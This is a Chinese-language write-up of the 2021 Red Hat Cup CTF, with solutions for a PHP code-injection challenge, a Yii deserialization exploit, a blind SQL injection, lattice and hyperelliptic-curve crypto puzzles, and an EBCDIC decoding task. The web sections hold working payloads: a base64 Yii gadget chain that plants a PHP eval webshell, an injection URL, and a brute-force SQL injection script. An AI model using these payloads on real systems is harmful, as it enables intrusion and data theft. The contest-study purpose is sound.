2021年红帽杯线上解题记录

2021年第四届红帽杯部分解题记录，草稿里存了半年没发。

find-it

在这个输入点拼接代码可执行。

code=?code=<?php%20phpinfo();//

读取hack.php的内容，找到flag。

flag{bac134ff-5265-4fa4-b333-66a84983225f}

primegame

import math
from decimal import *
import random
from sympy import Matrix
import struct

getcontext().prec = int(100)

primes = [2]
for i in range(3, 100):
    f = True
    for j in primes:
        if i * i < j:
            break
        if i % j == 0:
            f = False
            break
    if f:
        primes.append(i)

keys = []
for i in range(len(primes)):
    keys.append(Decimal(int(primes[i])).ln())

arr = []
for v in keys:
    arr.append(int(v * int(16) ** int(64)))

ct = 597952043660446249020184773232983974017780255881942379044454676980646417087515453

def encrypt(res):
    h = Decimal(int(0))
    for i in range(len(keys)):
        h += res[i] * keys[i]

    ct = int(h * int(16)**int(64))
    return ct

def f(N):
    ln = len(arr)
    A = Matrix(ZZ, ln + 1, ln + 1)
    for i in range(ln):
        A[i, i] = 1
        A[i, ln] = arr[i] // N
        A[ln, i] = 64

    A[ln, ln] = ct // N

    res = A.LLL()

    for i in range(ln + 1):
        flag = True
        for j in range(ln):
            if -64 <= res[i][j] < 64:
                continue
            flag = False
            break
        if flag:
            vec = [int(v + 64) for v in res[i][:-1]]
            ret = encrypt(vec)
            if ret == ct:
                print(N, bytes(vec))
            else:
                print("NO", ret, bytes(vec))

for i in range(2, 10000):
    print(i)
    f(i)

替换 ct 为两个 out 中的字符串，运行得到的结果拼接后获得 flag

flag{715c39c3-1b46-4c23-8006-27b43eba2446}

framework

www.zip 下载源码，d 盾扫描发现后门，存在 yii 代码执行漏洞

构造 payload

http://eci-2zeebn8ci69dyqxvw06w.cloudeci1.ichunqiu.com//index.php?r=site%2Fabout&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MzI6InlpaVxjYWNoaW5nXEV4cHJlc3Npb25EZXBlbmRlbmN5IjoxOntzOjEwOiJleHByZXNzaW9uIjtzOjEwNzoiZmlsZV9wdXRfY29udGVudHMoJy92YXIvd3d3L2h0bWwvd2ViL2Fzc2V0cy95LnBocCcsJzw/cGhwIEBldmFsKCRfUkVRVUVTVFtlZWVdKTtzaG93X3NvdXJjZShfX0ZJTEVfXyk7Pz4nKTsiO31pOjE7czoxODoiZXZhbHVhdGVEZXBlbmRlbmN5Ijt9fX0K

在 assets/y.php 生成一句话，蚁剑链接，使用 bypass disable functions 插件连接shell 获取 flag。

flag{a7a179b8-9765-433c-9752-efd5a4b3be52}

hpcurve

import itertools
import struct

p = 10000000000000001119

R.<x> = GF(p)[]; y=x
f = y + y^7
C = HyperellipticCurve(f, 0)
J = C.jacobian()
Ds = [J(C(x, min(f(x).sqrt(0,1)))) for x in (11,22,33)]

t = '66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5'
enc = bytes.fromhex(t)
known_pt = 'a' * 20 + 'flag{'
known_pt = known_pt.encode()

rng_output = bytes(e^^m for e,m in zip(enc, known_pt))

blocks = [rng_output[i:i+8] for i in range(0, len(rng_output), 8)]
ui = [int.from_bytes(r, 'little') for r in blocks]
u = x^3 + ui[2]*x^2 + ui[1]*x + ui[0]

L = GF(p).algebraic_closure()
roots = [r[0] for r in u.change_ring(L).roots()]

RR.<zz> = PolynomialRing(L)
v = RR.lagrange_polynomial([(xi, f(xi).sqrt()) for xi in roots])
vi = [v.coefficients()[i].as_finite_field_element()[1] for i in range(3)]
vi = [(int(-c), int(c)) for c in vi]

for rs in itertools.product(*vi):
    q = struct.pack('<'+'Q'*len(rs), *rs)
    rr = rng_output+q
    #print(len(q))
    #flag = bytes(rr[k%24]^^enc[k] for k in range(len(rr)))# :, enc))
    #print(flag)

    tt = ''
    i = 0
    for x in enc:
        tt += chr((rng_output[i%24]^^x))
        i+=1
        print(tt)

运行上面脚本获取 后半部分 flag

import itertools
import struct

p = 10000000000000001119

R.<x> = GF(p)[]; y=x
f = y + y^7
C = HyperellipticCurve(f, 0)
J = C.jacobian()
Ds = [J(C(x, min(f(x).sqrt(0,1)))) for x in (11,22,33)]

t = '66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5'
enc = bytes.fromhex(t)
known_pt = 'a' * 20 + 'flag{'
known_pt = known_pt.encode()

rng_output = bytes(e^^m for e,m in zip(enc, known_pt))

blocks = [rng_output[i:i+8] for i in range(0, len(rng_output), 8)]
ui = [int.from_bytes(r, 'little') for r in blocks]
u = x^3 + ui[2]*x^2 + ui[1]*x + ui[0]

L = GF(p).algebraic_closure()
roots = [r[0] for r in u.change_ring(L).roots()]
for _ in range(10):
 try:
  RR.<zz> = PolynomialRing(L)
  v = RR.lagrange_polynomial([(xi, f(xi).sqrt()) for xi in roots])
  vi = [v.coefficients()[i].as_finite_field_element()[1] for i in range(3)]
  vi = [(int(-c), int(c)) for c in vi]
#  print(vi)
  for rs in itertools.product(*vi):
   keys = struct.pack('<'+'Q'*len(rs), *rs)
   leng = len(keys)
   keys = list(keys)
   enc = list(enc)
   flag = ""
   for i in range(len(enc)):
    flag += chr(keys[i%leng]^^enc[i])
   print(flag)
 except:
  pass
     # flag = bytes(q[k%len(q)]^^enc[k] for k in range(len(enc)))# :, enc))
     #print(flag)

运行后获取前半部分 flag

flag{1b82f60a-43ab-4f18-8ccc-97d120aae6fc}

WebsiteManger

import requests as req
import string

url = "http://eci-2zeir5o8p6vh5j4c0dvu.cloudeci1.ichunqiu.com/image.php?id=1&&exists(select/**/1/**/from/**/users/**/where/**/password/**/like/**/'"
r = "%')"

prefix = ""
while True:
    for x in string.ascii_letters+string.digits+"}{!@#":
        payload = url + prefix + x + r
        print payload
        f = req.get(payload,proxies = {"http":"127.0.0.1:8080"})
        print f.text
        if len(f.text) > 200:
            prefix += x
            break

将 burp 转发过程中的 header 中 && 替换成 %26%26，运行脚本获得密码 0df549b13756efae827f0 登陆获得 flag

flag{de1a4ad3-856c-4aa9-afd1-5d57971543a3}。

签到

ebcdic编码，python原生不支持，需要安装额外库pip install ebcdic。解码脚本如下：

import ebcdic


with open('EBCDIC.txt', 'rb') as f:
    tmp = f.read()
    print(tmp.decode('cp1141'))

输出内容flagäwe1c0me_t0_redhat2021ü，调整一下flag{we1c0me_t0_redhat2021}。